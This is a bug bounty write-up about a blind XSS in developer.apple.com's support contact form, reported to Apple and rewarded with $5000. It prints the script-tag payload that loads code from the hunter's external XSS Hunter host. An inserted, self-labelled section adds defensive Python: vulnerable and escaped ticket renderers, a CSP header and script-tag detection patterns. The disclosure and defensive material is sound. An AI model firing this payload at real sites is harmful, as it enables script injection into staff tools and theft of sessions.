apple.com blind xss $5000

dimasaprilian993
May 7, 2021


Hey there, hope you are all good. This is my third time writing the story of how I found a blind XSS and got a $5000 bounty.

It's a simple story. I just used knockpy to find some subdomains and then I chose one of the many subdomains to be my bug hunting target.

Let's begin. I chose my target subdomain "https://developer.apple.com", registered an account there and logged in.

I looked around "https://developer.apple.com" trying to find some vulnerability there and got nothing. I did not give up and kept looking. After many tries I found the directory "https://developer.apple.com/contact/topic/select/SC1109/subtopic/select". Here I found a function where the user can send a question to the support team. I clicked it, inserted my XSS Hunter payload "><script src=https://dimasaprilian993.xss.ht></script> and sent it to the support team.
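What makes this a blind XSS is that the payload does not fire on the form the submitter sees; it fires later, when someone on the support side opens the ticket in an internal tool that renders the submitted text as markup. The example below is added here and is not code from the original post or from Apple. It assumes a hypothetical ticket viewer built from string concatenation and shows the vulnerable rendering beside the fixed one (HTML-entity encoding of every untrusted field), a CSP header as defense in depth, and a small triage check a security team can use to flag submissions that carry script tags. The ticket contents and the `probe.example` host are constructed sample data.

```python
import html
import re

# Constructed sample ticket: this is what a support form would forward to an
# internal dashboard. The body has the shape of the payload described in the
# post, pointed at a constructed placeholder host.
SAMPLE_TICKET = {
    "subject": "Question about my account",
    "body": '"><script src=https://probe.example/probe.js></script>',
}


def render_ticket_vulnerable(ticket):
    """Builds the ticket row by string concatenation with no encoding.
    Whatever the submitter typed lands in the reviewer's page as markup, which
    is how a payload sent through a public form executes later in an internal
    tool (blind / stored XSS)."""
    return (
        f'<tr><td class="subject">{ticket["subject"]}</td>'
        f'<td class="body">{ticket["body"]}</td></tr>'
    )


def render_ticket_safe(ticket):
    """Same row, but every untrusted field is HTML-entity encoded for the text
    context it is inserted into. quote=True also encodes quotes, so the value
    stays inert if a reviewer later copies it into an attribute."""
    subject = html.escape(ticket["subject"], quote=True)
    body = html.escape(ticket["body"], quote=True)
    return (
        f'<tr><td class="subject">{subject}</td>'
        f'<td class="body">{body}</td></tr>'
    )


def response_headers():
    """Defense in depth for the internal viewer: a CSP that only allows scripts
    from the app's own origin blocks an injected <script src=https://...> even
    if an encoding bug slips through somewhere."""
    return {
        "Content-Security-Policy": (
            "default-src 'self'; script-src 'self'; "
            "object-src 'none'; base-uri 'none'"
        ),
        "X-Content-Type-Options": "nosniff",
    }


# Patterns a security team might alert on in inbound support submissions.
_MARKUP_PATTERNS = [
    re.compile(r"<\s*script\b", re.IGNORECASE),   # <script ...>
    re.compile(r"\bon[a-z]+\s*=", re.IGNORECASE),  # onerror=, onload=, ...
    re.compile(r"javascript\s*:", re.IGNORECASE),  # javascript: URLs
]


def looks_like_markup_injection(text):
    """Triage helper for the defending side: flags submissions that carry
    script tags, inline event handlers or javascript: URLs so they get a
    human look. Encoding at render time is the actual fix; this only drives
    alerting and review."""
    return any(p.search(text) for p in _MARKUP_PATTERNS)


if __name__ == "__main__":
    print("vulnerable:", render_ticket_vulnerable(SAMPLE_TICKET))
    print("safe:      ", render_ticket_safe(SAMPLE_TICKET))
    print("flagged:   ", looks_like_markup_injection(SAMPLE_TICKET["body"]))
```

The safe renderer leaves `&lt;script ...&gt;` in the page as visible text, so a reviewer can still read exactly what was submitted without the browser executing it; the CSP is there so that a single missed encoding point does not become an externally loaded script running in the internal tool.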

Surprise! I got an email notification from XSS Hunter that my payload had executed there.

Lucky me. After that I immediately sent an email to "product-security@apple.com" saying I had found a blind XSS there, with a screenshot, the DOM and how to reproduce it. After a few days I got a reply like this.

Then, after a few weeks, I got another email saying my finding qualified for the Apple Security Bounty.

I'm really happy, it's the biggest award I have ever got.

Thanks again to the bug bounty community and all the people who helped me.

TIMELINE

4 November 2020: I sent an email to Apple Security

6 November 2020: Apple Security sent me an email

9 November 2020: asked for an update

10 November 2020: still investigating my finding

12 November 2020: awarded $5000

1 May 2021: bug fixed and disclosed
